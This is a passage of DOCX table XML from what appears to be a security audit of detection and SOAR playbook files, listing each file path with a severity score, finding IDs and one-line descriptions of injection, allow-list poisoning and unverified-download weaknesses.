              </w:rPr>
              <w:t>playbooks/MS_Graph_for_Office_365_Message_Eviction.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/MS_Graph_for_Office_365_Message_Identifier_Activity_Analysis.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-07,PB1-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-controlled e-mail Message-ID drives tenant-wide search, delete and restore (MS Graph, Gmail)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/MS_Graph_for_Office_365_Message_Restore.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-controlled e-mail Message-ID drives tenant-wide search, delete and restore (MS Graph, Gmail)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/Panorama_Outbound_Traffic_Filtering.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/Splunk_Identifier_Activity_Analysis.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection via untrusted CEF fields in Splunk run query templates (multiple playbooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/Splunk_Message_Identifier_Activity_Analysis.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection via untrusted CEF fields in Splunk run query templates (multiple playbooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/Splunk_Notable_Related_Tickets_Search.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPL injection via untrusted CEF fields in Splunk run query templates (multiple playbooks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/Zscaler_Outbound_Traffic_Filtering.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>app_template/default/data/ui/views/escu_summary.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dashboard token placed into a search with only literal-quote wrapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/asset_get_attributes.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unescaped input interpolated into SOAR REST _filter_* query strings (filter/parameter injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>baselines/create_a_list_of_approved_aws_service_accounts.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Previously-seen baselines and their consumers form an allow-list poisoning path (30 files)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>baselines/previously_seen_s3_bucket_access_by_remote_ip.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Previously-seen baselines and their consumers form an allow-list poisoning path (30 files)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>contentctl.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-14,DEP-03,DEP-04,DEP-08,SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dozens of app tarballs and a container image fetched with no integrity check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>dashboards/applocker.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unquoted dashboard tokens in a search that auto-runs on load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detect_gcp_storage_access_from_a_new_ip.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>New-IP and spike detections write their own allow-list from attacker-influenced events (self-poisoning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>detect_spike_in_blocked_outbound_traffic_from_your_aws.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2755" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>New-IP and spike detections write their own allow-list from attacker-influenced events (self-poisoning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
